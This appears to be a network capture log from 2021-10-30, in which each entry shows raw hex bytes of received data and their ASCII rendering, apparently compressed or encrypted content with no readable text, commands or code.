                                                                                                                                                                                      2021-10-30 11:52:16 UTC455INData Raw: 4f d4 86 e3 8e 1a 5f 26 e0 3f 13 bc 71 f9 38 8f 3e eb 87 6f d7 17 0a d8 55 f3 2e 9f 02 35 71 df e3 8f e7 a5 67 65 64 1f ab ff 04 65 fe 52 85 b0 83 34 ef a8 d5 67 d4 7a 47 2d 5f 26 f8 a1 1f ac 40 2d 13 82 e0 ac d1 2b 4c a5 a5 e6 aa 68 55 b8 99 2b 66 05 6b 46 31 58 4c 80 06 12 a4 65 d7 aa 39 41 1a b2 03 34 50 95 e6 b1 67 82 b4 3c 6e e4 b1 a7 1b a3 b7 4e 1d ac 51 71 20 24 99 1b b1 03 24 61 fe 5d 43 b6 22 19 3c b3 8a 72 c2 3b 70 12 a8 3b 6a 53 f5 43 f3 aa 26 12 13 ab d6 5e a1 3f 3c 49 fb 94 cf 6b b4 7c ac c7 9f 6e 4b b1 64 6e 4c 69 0f eb 66 b5 a7 65 e5 d8 48 5b c2 29 09 db 9b a9 11 b2 3c 0d 26 ea 2a 11 6a 65 d8 ce a6 60 ea 70 af d5 69 cb 3e 79 e8 a4 b7 7e a2 e5 2c 7d b4 4e 27 5a 9e f6 64 2c 14 61 2e 21 59 92 d7 41 08 01 99 30 41 d9 6d 50 81 5a 02 36 6c 61 06
                                                                                                                                                                                      Data Ascii: O_&?q8>oU.5qgedeR4gzG-_&@-+LhU+fkF1XLe9A4Pg<nNQq $$a]C"<r;p;jSC&^?<Ik|nKdnLifeH[)<&*je`pi>y~,}N'Zd,a.!YA0AmPZ6la
                                                                                                                                                                                      2021-10-30 11:52:16 UTC457INData Raw: e0 47 a0 04 6a 7c 46 8d 2f 14 f0 19 b5 5b c7 1d 3e 1f 75 42 72 3e e8 83 7c ea 95 37 e3 3e 82 b4 62 7e 1a 24 3f 02 fc 52 ed d8 81 1a 8f 3f bd a3 f6 a5 1f fc 23 89 7d 14 84 f1 7b 1f 2d 3b 58 ab 5d 35 6c 46 71 cf 06 aa 8f 94 83 03 32 c6 1a b4 5c 28 76 90 26 fd a5 02 b0 7e f4 e9 20 4c 36 a3 98 60 2d 9c 00 8d 6f 7c 66 f7 2a 9f 4f e3 82 a4 21 34 96 00 8d c5 69 ef a4 05 d7 0e 9a d0 cf 8c 41 15 db c1 9a f2 aa b9 52 e5 4d 87 ea 84 e6 94 b9 d7 de 0e d4 1c 40 4e 59 79 69 db fa f6 a7 cf 88 fa 86 3f c9 7e 51 87 99 35 74 c8 4a 03 bb 7e 0f 69 63 31 24 6f 43 de b4 64 15 9a f2 80 2d 08 ee 9a d4 89 42 9b 34 59 6c d3 3b 17 44 e4 8d 27 c2 91 79 ca 77 39 45 25 9f a8 2d 1e 27 0d 80 c7 49 37 19 ef 76 11 8c 1d 76 d2 34 5a 15 ac e9 e4 39 3f e8 81 73 3d 6a 22 75 95 d3 15 ac 41 4b
                                                                                                                                                                                      Data Ascii: Gj|F/[>uBr>|7>b~$?R?#}{-;X]5lFq2\(v&~ L6`-o|f*O!4iARM@NYyi?~Q5tJ~ic1$oCd-B4Yl;D'yw9E%-'I7vv4Z9?s=j"uAK
                                                                                                                                                                                      2021-10-30 11:52:16 UTC458INData Raw: 9f f4 57 65 b9 a6 f8 cc 19 bb 65 6f 2b 20 23 48 fb c4 1b 6f 5e 3e 31 02 35 ec f9 99 0e b5 61 05 6a b4 54 a4 36 18 e9 29 5d 02 4b ee f3 e1 cf a3 69 bd e8 7f 19 05 fb b1 67 ed a6 25 50 7b 9e c7 9f 3c fa fc e9 1f f8 e3 af ee e9 cc 77 90 d6 81 5a 50 6d 76 80 16 db 5a 5c 0a 9b aa 2d 6a 84 86 d6 77 cf 60 f3 cb 97 15 ac f5 8e 5a 05 6a e7 9d 35 07 69 b0 9c 27 50 cb 4e 5a 2e fc ec a6 79 10 18 90 42 07 3f a0 06 d7 8b 34 d8 2c dd 01 1b 76 35 cb 01 13 ac e6 ba f9 aa 03 62 02 31 57 99 44 ec a0 25 48 ab 00 4d 7a 07 6b 33 50 9b 9f 53 eb 40 05 a0 5d 09 d0 60 ce b9 ea 56 ea d2 95 2f 88 2d ed 58 ed b1 b7 96 af 60 09 9e 06 79 17 96 62 83 a0 32 06 38 6f 56 2b 4b d7 a1 0e d5 c5 c0 3b 72 d0 d4 68 52 4a f9 70 5f 2d 83 dd f7 b2 83 9d 11 9a 2e 20 8a f0 52 c7 73 fe 60 02 31 a1 03
                                                                                                                                                                                      Data Ascii: Weeo+ #Ho^>15ajT6)]Kig%P{<wZPmvZ\-jw`Zj5i'PNZ.yB?4,v5b1WD%HMzk3PS@]`V/-X`yb28oV+K;rhRJp_-. Rs`1
                                                                                                                                                                                      2021-10-30 11:52:16 UTC459INData Raw: e5 63 0e d4 de 54 a0 56 c1 9a 77 d5 1e d9 9e 40 8d cf a9 dd fa 9f c5 e7 cb 04 9e 05 39 21 74 d4 40 3f 1b 33 fe fb 8b 03 fb 91 67 76 d3 14 a4 29 58 7b bf 1e 7d 12 ac 79 47 ed 27 7e e0 4f ac 40 ed f6 46 7f 15 0a 17 9f 02 b6 bd a8 a0 a7 11 6e d0 22 29 3e 0b 60 4d eb 15 ac e9 22 46 d6 48 f0 1b 6a de 59 2b 76 70 56 81 9a 75 95 3b 3e 5e 74 a5 72 a9 45 9e 9b 36 58 72 07 69 e6 96 85 e7 20 cd 69 92 75 fb 4f 1f 54 8f 49 c8 04 82 73 43 50 fd c2 c3 ae 1a b6 81 b4 8f 76 d1 46 a9 6e 97 fb 2e b4 6f bd 56 7d 46 b1 72 e4 86 11 99 7c c6 ab 8c d7 ad 73 30 46 74 df 2d 97 b1 11 c1 a2 0e 1b e5 ab f4 70 9d c3 be 20 ca 96 6c a9 f7 20 37 91 b1 ad 07 39 18 4f 2e ea 49 79 a0 d6 57 fb 6a 9c 18 20 4d 24 07 6b 15 a4 e9 04 ae 00 2d 18 79 21 f5 49 94 90 69 26 a9 dd 47 e6 55 72 27 98 94
                                                                                                                                                                                      Data Ascii: cTVw@9!t@?3gv)X{}yG'~O@Fn")>`M"FHjY+vpVu;>^trE6Xri iuOTIsCPvFn.oV}Fr|s0Ft-p l 79O.IyWj M$k-y!Ii&GUr'
                                                                                                                                                                                      2021-10-30 11:52:16 UTC461INData Raw: d4 90 3b 50 7b 7b 05 6a 6a 93 ee 59 04 6a 94 cd 8c 08 69 44 d3 4d 5e c2 fc b1 c9 da 56 3b 6a e6 11 ac 09 09 d2 08 ce 08 d4 de 25 50 63 47 ed bf f8 81 ff 76 02 35 39 f2 63 4f 05 69 c1 70 82 34 61 c9 b4 63 06 6a c8 18 67 f3 d8 ad 8a ac a3 ef e8 ac 2a 1a f6 0a d6 5e bd dc 3b 6a 87 80 0d 5d 65 1a d7 05 98 4a 17 fb c6 94 95 cf 03 e3 9b bc 54 cb b6 45 0e b7 4c 6b 2a ff 6a 9b de aa 2b 03 08 ab 6e 9d 5f 07 63 8d b2 27 60 53 b0 a6 52 60 07 93 b4 6f 2d 50 ed 17 74 7d 62 ab d5 06 a5 06 69 8f 6b 5f 78 9d 55 f1 d0 39 dc 95 4b 88 69 cb 03 ed c7 d8 f5 e5 1c fa 82 20 cf c2 c8 10 72 46 fe 48 4e 2d e7 c9 99 5c c8 8c 61 f4 1c 0e a5 3b b3 4c b6 d6 c1 37 6d b1 51 8d eb dd d2 73 80 16 4e 9a 86 3d ba 08 d9 75 4f d6 a1 2f 8a 96 eb 2d 52 f9 08 22 8f 5e a1 5e 56 5a e6 48 75 25 93
                                                                                                                                                                                      Data Ascii: ;P{{jjYjiDM^V;j%PcGv59cOip4acjg*^;j]eJTELk*j+n_c'`SR`o-Pt}bik_xU9Ki rFHN-\a;L7mQsN=uO/-R"^^VZHu%
                                                                                                                                                                                      2021-10-30 11:52:16 UTC462INData Raw: 4d 79 f9 cc dc b5 40 2d fd 66 6c e9 26 fe 33 36 eb d1 e7 0a d6 b2 9b b6 be f1 39 02 35 be fd 79 fb c7 be eb 37 7e d6 8f 15 35 10 b9 16 41 09 7a e7 42 f3 34 30 f3 a1 7e 26 9d d9 b2 82 2b f1 d4 33 ac c9 cf f0 9a dd f8 ae 63 d8 2b 8f cb b8 4e 30 9c df bc e2 24 68 f0 39 11 f0 6d 9d 94 b2 25 2d 2c d5 ba de 76 65 5d 82 75 5e 8d aa 31 12 c3 17 0d 9d 01 dd 7f 65 0a 19 d8 25 97 5d 4e 5c 46 e8 9b 21 c8 cb 3a 2a 41 59 ea 7c 7d 80 16 3b f9 8d 8b d3 1a ec 6d cb c8 4f 7d a7 cf b2 e9 e3 e0 d6 17 ca 0f b2 98 72 fd 57 fe 41 6e d6 4a d0 b2 f3 0f d9 ba 0a 59 77 d9 6d 5f fa b0 c7 ff 15 c6 be fa 16 c4 16 5d ac c1 b7 fd 84 3e 1b c8 e6 9a 89 a7 8b da 3f 8b a0 89 1f 8c 9c d5 5d bc 74 d2 85 5c 31 95 b7 d3 83 2c 1e 54 e7 c3 42 16 e2 d5 46 18 03 68 bb d2 67 1e 95 b1 4c 59 90 ba 85
                                                                                                                                                                                      Data Ascii: My@-fl&3695y7~5AzB40~&+3c+N0$h9m%-,ve]u^1e%]N\F!:*AY|};mO}rWAnJYwm_]>?]t\1,TBFhgLY
                                                                                                                                                                                      2021-10-30 11:52:16 UTC463INData Raw: 3e 76 ce 1a 8b 55 e6 85 86 37 17 72 2e e6 c6 dc 7a 87 3f 7f 78 82 3a da de f5 09 ab 6e b7 c1 bd a0 57 3b 58 f3 5f a0 c2 c5 5a dc 56 c0 26 5e 83 a3 b2 60 2f 64 07 56 ad 90 52 4a 12 31 23 01 b7 e3 84 12 22 8f 09 58 3a 2c d5 c5 f1 0d 79 c2 f0 12 ba a7 77 90 de 07 29 82 0c 52 de 68 f6 28 bc d6 ee 32 65 5f e5 5f c3 1c dc 62 4d 84 b6 ad f2 62 da c1 45 d1 72 b7 2d ac b3 52 b2 4f 05 78 e0 94 d3 7b db 4a ee 3a 7c a6 9d 8f fa 8b ed b7 b8 6d b0 07 14 8c dc 76 4e 42 d2 33 fa 59 10 07 73 92 96 5d e5 5c 1e 56 fe 96 59 b4 b4 c2 27 48 93 dd ab 7e 7c db 0e 5e e1 6d ef f6 0c 52 07 77 bf 23 97 79 51 44 15 16 a5 ad 41 eb ed 17 b4 ae 03 75 96 dc f9 57 5b c8 54 b2 69 e1 16 93 5e b2 13 4a 14 75 3d b6 15 db ff ca 57 68 1f c7 1b 44 db 4c 06 74 6b d5 c6 c8 d0 ee 7e f7 f7 48 ee 5f
                                                                                                                                                                                      Data Ascii: >vU7r.z?x:nW;X_ZV&^`/dVRJ1#"X:,yw)Rh(2e__bMbEr-ROx{J:|mvNB3Ys]\VY'H~|^mRw#yQDAuW[Ti^Ju=WhDLtk~H_
                                                                                                                                                                                      2021-10-30 11:52:16 UTC464INData Raw: 6a 2e 23 41 ef c9 f6 d6 e6 85 69 4f fa 97 b9 9b b4 08 f9 83 20 b8 76 cd 98 80 c2 04 67 f2 5a f6 04 6f 93 b3 ad 42 08 90 1a 94 c7 3b 67 e1 04 68 b0 d4 d5 70 15 a3 2d 42 c6 98 52 04 61 3c d2 f4 4e 9a e4 67 92 f3 0b 08 ec a4 25 48 5b 9f d5 16 d3 cf ac 89 e3 9e 2d f4 2e 98 38 41 16 78 b3 82 b5 07 aa 8f 7b 24 41 19 01 5a 3e e7 99 2f e9 a0 3b 4d f9 1a 2d 33 95 a5 fb ac 0b 13 a0 51 3b 58 81 5a 05 69 7c 3e ad 83 35 3f fe ac 5d 34 3f fa 24 58 f3 a3 cf ec 5a 51 1a 87 f4 c1 81 1a 3b 66 0a d4 d8 41 7b ab 76 d4 76 90 76 ff f2 e0 41 02 35 ef a6 09 bd 69 c4 75 ed 49 21 57 13 d5 4e 73 c9 09 d0 d8 3d 6b 4e b0 f6 5c e8 ff fb 29 e6 e7 3a 1c a8 89 6f 7f e0 57 fe 96 cf d2 b8 74 b3 58 ba 07 5f 35 70 22 08 d2 f8 b7 4e 1d b0 11 a0 3d d7 ca 43 90 c6 8f d6 ca 8d e4 fc 35 d6 bc 2e
                                                                                                                                                                                      Data Ascii: j.#AiO vgZoB;ghp-BRa<Ng%H[-.8Ax{$AZ>/;M-3Q;XZi|>5?]4?$XZQ;fA{vvvA5iuI!WNs=kN\):oWtX_5p"N=C5.
                                                                                                                                                                                      2021-10-30 11:52:16 UTC466INData Raw: 03 77 80 16 79 06 6a 2d df 0d d8 ca a7 b0 eb ec 80 4c 60 d3 9e 4f a4 55 fa e2 e8 16 4e 81 9a 3f be 01 b6 ac ab c2 c1 1a 98 2b 44 ed 16 7a d7 ac 31 a3 6b 54 e3 72 6b 45 17 5a 56 31 c6 4f b2 cf 89 b8 77 ca f8 6c ba 03 35 65 bc 16 ac a5 56 8f 54 9c 49 4f 90 96 40 c7 01 9a 74 07 69 e2 fd c3 b4 7c 1b 3b bb 63 0e ce d4 9e 0e d2 7a 37 8d 6f b5 62 63 aa d7 a5 21 7f 09 d2 e6 1f 44 7a 8b e8 63 c6 21 61 6f ed a6 89 f9 4c da f3 19 a4 ad c7 9e bd ab 96 3f cc 08 98 28 89 43 e2 0d be b8 e8 47 9f 0a c8 f8 f2 c0 9b 0f 1f 64 57 4d 41 9a 77 d4 74 9d 3d 64 47 4d bc 02 35 35 94 6b da c3 a1 cb 6d b3 ce 21 e3 5b 43 c5 1c 7f a1 7e b2 8b e6 b5 46 e7 30 ff 4b b5 bf 01 5a 81 9a da 46 3b 09 26 6f ff e0 77 ff d6 cf d2 3a ba 1a e6 42 cd 09 e3 24 74 80 d6 8f 38 7b 47 cd 72 31 f9 9a b7
                                                                                                                                                                                      Data Ascii: wyj-L`OUN?+Dz1kTrkEZV1Owl5eVTIO@ti|;cz7obc!Dzc!aoL?(CGdWMAwt=dGM55km![C~F0KZF;&ow:B$t8{Gr1
                                                                                                                                                                                      2021-10-30 11:52:16 UTC467INData Raw: 81 16 b2 2a 45 c6 e6 1f 2f 96 4e 50 76 5f 13 c0 68 9b b8 f4 70 95 17 67 9d 91 e1 c4 9e 71 85 7e 49 5e 41 5a 21 e9 ce a3 49 b7 7d a8 22 eb ba 4b 76 90 66 d4 1d 18 79 dd 3d c5 5a 64 f8 b1 fa de 39 b3 5e 41 99 7f 72 49 1d 0c 33 d7 d4 77 33 72 98 79 95 18 a0 ef e7 b5 9b 26 ef 9b a3 3b 50 13 93 37 83 cd b8 e7 5c f8 91 a7 98 40 a7 83 b5 fc 00 75 e4 fe 9c 59 3f f6 d4 94 17 6b 1c 61 8d 45 30 f6 9d ce 54 c7 47 fb 89 ac b7 fb e4 bf 5b e8 b7 5b 02 66 67 2d c1 1a 41 58 d8 3b 57 1a 3f be 49 39 77 af f8 a3 cf d7 ba 1d 28 d8 94 63 76 d4 f8 56 a7 bf 4c a0 a0 8c dd b4 b7 1e 75 a0 76 df 81 9a 77 d5 14 b4 39 48 ab 40 2d d7 b7 dc 0c 76 07 d4 46 76 d4 08 d2 a8 87 dd b4 0e d0 56 90 56 c1 e3 fa d1 db e7 70 1e d1 de fe fe ef f9 1d 9f 9d 5d 0c fb d4 fb e2 25 30 43 3e 06 6a f5 6d
                                                                                                                                                                                      Data Ascii: *E/NPv_hpgq~I^AZ!I}"Kvfy=Zd9^ArI3w3ry&;P7\@uY?kaE0TG[[fg-AX;W?I9w(cvVLuvw9H@-vFvVVp]%0C>jm
                                                                                                                                                                                      2021-10-30 11:52:16 UTC468INData Raw: 20 6d 05 6b 0e d4 06 d3 43 a1 7b 6a 88 ce 0b d9 2f a3 b3 04 db 26 26 cf e4 5e 13 ef e9 46 ee a0 4c bc 03 b5 d4 e7 3a 41 55 48 60 e6 3e 10 a0 dd 82 6a bb 3a d4 53 25 32 81 8d fa ee 00 42 d8 03 c4 5c d0 9c e0 1e ec 2f 12 08 09 ce d6 4e 9a e5 fd f8 d3 f9 52 b3 fa c0 b8 73 2e ae 3f f6 64 ac 2d ab 9a 19 ac 65 ec 41 da ad b4 85 b2 e3 87 3c 23 ff 6b 03 35 d7 49 19 ba 92 16 31 2e 5a 09 34 7c 0e d5 1c ac bd 74 40 c6 6e 1a eb 08 3b f2 04 48 79 ec e8 75 83 d3 21 ca 5c 92 7f 0d 98 77 d4 74 8d f9 cb 04 1d a8 11 a4 89 bd a3 f6 50 c1 5c 05 6b d9 55 ab b1 ad 60 4d 43 91 f1 95 4c 90 96 1f 38 4e 90 e6 5d 34 b7 61 ef a2 79 07 ed 85 82 b3 67 09 d2 f8 8f 04 fe a7 ec c2 db df fb 3d bf 53 81 9a 06 1d 1e 27 80 93 e1 c0 ac e4 ec ae ed 93 d4 51 75 02 ad 9a 32 4a 0f e5 a2 31 ea 05
                                                                                                                                                                                      Data Ascii: mkC{j/&&^FL:AUH`>j:S%2B\/NRs.?d-eA<#k5I1.Z4|t@n;Hyu!\wtP\kU`MCL8N]4ayg=S'Qu2J1
                                                                                                                                                                                      2021-10-30 11:52:16 UTC470INData Raw: b3 ae bb 9c e6 1a 01 9b 83 24 21 bf c3 88 9c 40 0a 96 03 21 03 27 77 46 98 97 65 a5 f9 55 38 d3 38 ba ec 28 6f 9f 96 55 4f 31 c1 23 ed f7 cf 56 78 f7 2c c1 4c 9e 82 13 58 84 1f 38 30 53 1f 0f 98 40 cd ff 82 d1 ac c2 1a a4 1b 3e af e8 fb 7d b1 6a 52 48 90 00 6d 05 69 c8 f5 c8 53 d8 1b 37 69 a9 2a d7 78 9e 3f 9f 16 66 9c 83 3e 0f ca 4f b5 ae 5a 25 8d cd 78 1a 98 e0 2b f9 7b e7 cc 7d 55 db 3b 68 73 df 9c 27 e7 55 a0 1a 78 41 19 cb 15 9c d5 e3 4d 7f 4b bc 98 ff 5d ca e7 c2 76 a0 a6 73 21 27 3d d7 1c a8 b1 a3 26 7e 43 d7 1a 41 5a ef a8 f1 f8 f3 91 ae 39 d8 5f 26 60 47 4d e3 dc df fc ec 6b 9c 89 05 72 99 d1 b9 ec a6 51 5f 76 d4 fa 7f 7b f2 a8 f3 bd 0e d2 14 9c bd fb 34 c1 d9 e6 67 0a d4 be e7 5f aa 2f 13 14 ab ab cd 33 7a 86 99 32 13 19 1a ca 80 cd 7e c9 b6 35
                                                                                                                                                                                      Data Ascii: $!@!'wFeU88(oUO1#Vx,LX80S@>}jRHmiS7i*x?f>OZ%x+{}U;hs'UxAMK]vs!'=&~CAZ9_&`GMkrQ_v{4g_/3z2~5
                                                                                                                                                                                      2021-10-30 11:52:16 UTC471INData Raw: 96 0b 59 c7 1d ac 69 26 ad 0f f1 eb 04 f2 38 d2 27 92 f3 82 3c 91 59 20 f4 ac b0 bd 74 ca 9e b8 83 be b5 83 47 7d f2 80 ac b3 18 d6 d8 f6 ef 8e f5 a3 bf c5 6a 38 c1 84 7f 74 55 f2 7d 07 0d b7 1a 3f b1 06 f7 9e f0 1e 68 d6 1c 10 ae 1f 48 56 79 7f 2e 6d f2 4d 7e f8 d8 01 99 ea 35 23 ab 37 b9 af 73 27 db f7 eb cc 89 3d 07 fc 32 62 ea f4 50 f2 87 6a 94 f6 3c 32 ab 4d a0 da 91 c7 b2 6a ab b8 db 4f 7f 36 df 37 f2 39 32 98 47 94 96 95 bf 1f 91 b6 0c 26 d8 23 b0 0b d3 42 0d e7 6e a7 18 39 b4 a5 49 b4 f7 48 75 6e dd b3 4e ad 5e 62 9f 05 92 cd e6 e3 da 40 e0 b6 83 46 90 00 0e ce 6e 5b 64 f8 9e 07 5f 0d ed 93 70 9d 93 9e a9 9b 93 74 e4 b2 cb cf b4 51 76 db c8 13 66 30 b0 4d 0c b5 cc 09 8f b8 2d c5 1c 4a ce a1 48 72 a7 4f e6 e0 17 ba b1 e4 13 e6 c6 cc 3c 61 e1 60 2e
                                                                                                                                                                                      Data Ascii: Yi&8'<Y tG}j8tU}?hHVy.mM~5#7s'=2bPj<2MjO6792G&#Bn9IHunN^b@Fn[d_ptQvf0M-JHrO<a`.
                                                                                                                                                                                      2021-10-30 11:52:16 UTC472INData Raw: 10 a4 09 13 a4 dd 37 1e 02 34 71 fe 4d 58 02 b4 7e 62 96 e0 4c ac 16 5d 67 02 b6 0a de 74 8d 26 68 0b 77 ef 18 15 de cc 83 ee ed 4e 0b 73 1d 36 d6 e8 c9 57 73 07 86 b2 ab 4d 0e 0a 85 8e 37 58 b8 84 dd 07 75 ca d8 81 9b 83 b7 c1 0e c8 ee dd cf d8 48 ee 1d b5 89 0e d6 8c 9a 57 f2 bd d6 78 b5 05 6a dc 44 cb 01 e1 10 bb 73 3e df e9 98 78 cb 9a 0a 75 0d b7 2c 73 5d ef bd 16 4c b9 ff 30 dd cc 1a b7 f5 7b 0e c2 d4 bc 0f e3 3a 1b e6 74 2b 38 2d 4c 6e b9 d3 50 87 9d e6 81 68 dc cc 42 97 41 4a b9 2e d3 72 db 41 b3 fd a5 25 ea b6 8f b1 15 d9 c4 c8 59 bb 43 33 ef f6 17 b9 6f 3e 8d f9 6c c3 07 b0 ae 32 b0 83 36 f2 cf 35 f2 c0 ae 91 46 15 d7 59 3e dc c4 7d 42 b1 69 c1 16 26 38 e3 d9 fa d6 9b bd c0 23 b3 b8 97 9e c0 aa f4 21 af 89 a2 2a 25 da a6 ec 42 26 07 79 22 db 3e
                                                                                                                                                                                      Data Ascii: 74qMX~bL]gt&hwNs6WsM7XuHWxjDs>xu,s]L0{:t+8-LnPhBAJ.rA%YC3o>l265FY>}Bi&8#!*%B&y">
                                                                                                                                                                                      2021-10-30 11:52:16 UTC474INData Raw: 8f 5b b3 e3 e7 80 4d ed ef 60 ed 10 b4 2d 54 b0 26 dc 3b 6c 1d b4 cd 80 ed c8 fb 31 68 82 34 e2 93 7e e5 ac a9 0f 74 a2 e6 3e d7 4c e3 62 75 a4 03 2f cb cf 74 ed aa 63 8d 2f 1b c5 2f 26 3e d3 18 c0 04 6f 2a 97 60 0d 99 60 4d 63 2a 36 6a 4c fb df 6d 82 de 51 6b 62 f0 9b 6b 9a 1d b8 3b c2 4b 73 b8 98 c9 a7 79 d2 ac d2 1a be d2 25 9b b1 b7 2d cc 5f 12 53 df b6 2a 23 3f 6b c7 40 f6 6e 15 ad 0c 15 7a 44 2d ec 24 d3 50 10 ad 46 90 cb f2 d5 3d 93 cd 75 88 75 a0 be 04 6b 62 75 f2 10 88 a9 a1 07 9c 4c fe 2a 33 51 6f f1 6c bf b8 da b3 6f 2c 3a 89 57 78 05 67 57 79 3f 22 85 99 40 67 bd 19 5f 53 ee 3c 5e a3 8d d2 75 45 59 5e c8 04 8a bd b9 83 34 39 29 64 f1 0f de e1 3b c1 5a a1 3b df e3 c0 b8 78 30 4c 53 6e ca b8 15 b6 b2 7c 9c ec 60 73 d1 56 cb 58 e7 24 38 59 26 9d
                                                                                                                                                                                      Data Ascii: [M`-T&;l1h4~t>Lbu/tc//&>o*``Mc*6jLmQkbk;Ksy%-_S*#?k@nzD-$PF=uukbuL*3Qolo,:WxgWy?"@g_S<^uEY^49)d;Z;x0LSn|`sVX$8Y&
                                                                                                                                                                                      2021-10-30 11:52:16 UTC475INData Raw: 4f 06 da 5e ac e0 ec e5 53 31 b8 82 34 21 81 9a f8 95 83 34 d6 0e 21 7d 72 bf d4 17 02 cd df f3 ab 7f d7 67 25 a9 55 77 b9 ba 30 a4 68 9a 43 e6 0e b6 1c 94 c9 6d 07 5c 7c 63 e5 c1 d2 c9 33 83 31 ca 35 46 6e 5f 9a 76 9a 98 6d 17 4f 99 81 15 7a e2 ab 1d 9c 0e b0 49 e6 0f 27 06 3f 87 03 51 34 c5 67 3f 39 48 c7 71 a3 4d 91 7d 92 9d 74 46 71 72 8e e3 a8 95 13 d1 22 2f 29 3d c9 97 bc 6c 8d 51 ac fb 78 cd de 54 fe 55 71 23 c4 a2 67 f4 51 d4 0d 33 8d 85 f8 50 71 d9 7d 55 1e ed 07 e6 92 29 44 cf b7 5b 49 ab fc 5d ab 21 f6 e4 df 34 47 85 31 6c 6a d9 e3 8f 2c 8c 2c e4 65 3d 79 22 c4 8f b3 0e 5e e4 72 80 8e ce 1f 1f 18 e3 ab 65 27 19 2d f7 84 1b b6 ce 43 5a df 6c 6c ab 3e 84 63 37 81 66 94 46 51 97 ab 7c ed e7 88 43 5e 01 57 cb f1 65 9b cb 87 db 16 a3 78 50 6a d2 0c
                                                                                                                                                                                      Data Ascii: O^S14!4!}rg%Uw0hCm\|c315Fn_vmOzI'?Q4g?9HqM}tFqr"/)=lQxTUq#gQ3Pq}U)D[I]!4G1lj,,e=y"^re'-CZll>c7fFQ|C^WexPj
                                                                                                                                                                                      2021-10-30 11:52:16 UTC476INData Raw: 78 35 45 6a 5b 8e 34 9e b1 e9 b5 81 85 ca 01 99 ba d7 81 58 cb 67 4e e0 56 01 9a fc cc 20 cd 41 d9 90 db 7f f3 aa d3 f5 77 8b c2 50 23 64 99 43 46 fc 2e d5 c9 bc 43 cb 59 84 55 4f e9 90 6d e8 4e 6b d9 29 f5 72 52 f2 61 46 2f 5c a4 fa 6d ab 66 a4 39 35 b5 4a ce 1b 65 f3 d6 81 68 b6 97 b3 4a 31 5a ab 8a 6d 97 3c 6d d1 92 33 0b 67 21 6d b3 8a 2c d4 04 d9 7a d9 08 c4 ea 6a ed 00 0d f4 6f 05 91 66 5f 42 6c e5 73 b1 a8 eb 33 a0 db be d9 f5 0d 72 93 75 00 23 d7 58 33 d0 95 90 31 b7 68 dc 94 36 d8 5e d8 94 32 dd 88 d6 5b c6 ff d9 a6 bc e0 da c9 42 2e 5c 4c da 91 5d c6 75 4c 5b d9 0b dd f7 91 6f a6 ad 3c c2 59 c7 4e 1b 76 b5 2d 4e 62 33 39 11 8c da a4 9c 9b 75 08 6a 51 29 5d b7 4a 9f e6 5e ec b6 9c d3 ef 20 a9 74 16 f1 c9 2c 2a f0 7a cc 37 ec 4b 96 7f e7 93 03 90
                                                                                                                                                                                      Data Ascii: x5Ej[4XgNV AwP#dCF.CYUOmNk)rRaF/\mf95JehJ1Zm<m3g!m,zjof_Bls3ru#X31h6^2[B.\L]uL[o<YNv-Nb39ujQ)]J^ t,*z7K
                                                                                                                                                                                      2021-10-30 11:52:16 UTC478INData Raw: 52 24 54 a5 be 88 2c c4 9e f6 80 16 22 57 7a 63 49 11 8d bb 5e 07 31 7a 3b ad 27 c5 9d b6 60 a8 34 73 e9 ca 68 99 02 4e a8 9b 7a e7 6d 07 db 51 c9 29 bf 6e ec 9d 1f 5b a7 59 1f 34 db 26 79 b5 81 bc d6 7b 09 29 b9 da d6 41 43 b7 cb 58 f5 a6 7c 68 d5 55 f9 56 5e a8 70 ea c8 f1 05 6b 7c 35 81 8e b6 05 c5 b4 27 18 2a 5d 07 90 63 97 5f 81 df e2 6e f7 b4 89 1d 80 21 cb 67 07 63 42 ff 81 71 08 ce 9a f1 51 72 aa 14 45 37 55 7a db 6d 2d 39 d4 33 76 eb 5d c6 3e 3a af f5 92 21 c9 d1 65 11 62 dd bc cf 24 8b 48 a3 19 59 96 d6 75 6b f7 e2 96 e0 0c 66 c1 29 44 67 01 12 7a f1 91 bd 17 14 16 a1 d8 a2 f7 62 ef bc 95 a7 65 ef 90 61 53 f9 be 49 f4 ae 99 77 d4 f0 4b 5a d9 12 a4 a5 7c 6e f2 ea 43 21 54 b0 84 3f f8 df fc 0d 97 4f 7f e3 c7 a3 7c 0d f4 37 7e e4 ef 5e fe ca 9f fd
                                                                                                                                                                                      Data Ascii: R$T,"WzcI^1z;'`4shNzmQ)n[Y4&y{)ACX|hUV^pk|5'*]c_n!gcBqQrE7Uzm-93v]>:!eb$HYukf)DgzbeaSIwKZ|nC!T?O|7~^
                                                                                                                                                                                      2021-10-30 11:52:16 UTC479INData Raw: 5c e9 43 ee 1b bb 77 6b 24 dc b3 4d 69 c8 20 f9 ac b7 5d a8 c1 dd ba d8 79 d0 8b 2b b8 c8 44 97 bc d2 c9 5b ba 31 32 e4 7a 85 09 d2 48 af 32 ab 3d 85 87 c0 25 36 32 37 9a fb e4 43 65 4b dd c8 95 d0 76 5e c8 2e 23 41 8d 76 80 06 3b 8f 33 05 cc b1 af b6 0f 39 ed b5 29 f6 62 0e 2d f7 8d af e5 d8 77 5f 36 b7 2e a4 af 3d e6 6b 6c 83 30 2b 3f 79 83 25 9b 72 ae 73 0c 65 81 89 ad e5 15 80 f8 35 b1 48 fe 62 89 7c c0 41 5c 4f aa 5d 7e f9 0b bd 02 32 63 73 dd 18 40 e9 2c 2c c8 3b 48 0b 66 41 27 a0 0a 26 28 4b 20 e5 80 6a a6 ab 0c 18 1b 7a 38 7e b2 f0 44 8f bc 6e 1a f6 87 af e1 d7 3e c3 bb 3d 5a 84 d5 2b 58 a6 35 66 39 84 7e df 0f ff da cb 37 7f db 27 4b fb ea e9 1f fc 9d 9f b9 fc e9 7f fb 3f d6 79 d3 ba a7 f1 32 6a 2c 8f 9c 9b 4a cb 66 95 dd 98 53 32 f3 77 90 06 1f
                                                                                                                                                                                      Data Ascii: \Cwk$Mi ]y+D[12zH2=%627CeKv^.#Av;39)b-w_6.=kl0+?y%rse5Hb|A\O]~2cs@,,;HfA'&(K jz8~Dn>=Z+X5f9~7'K?y2j,JfS2w
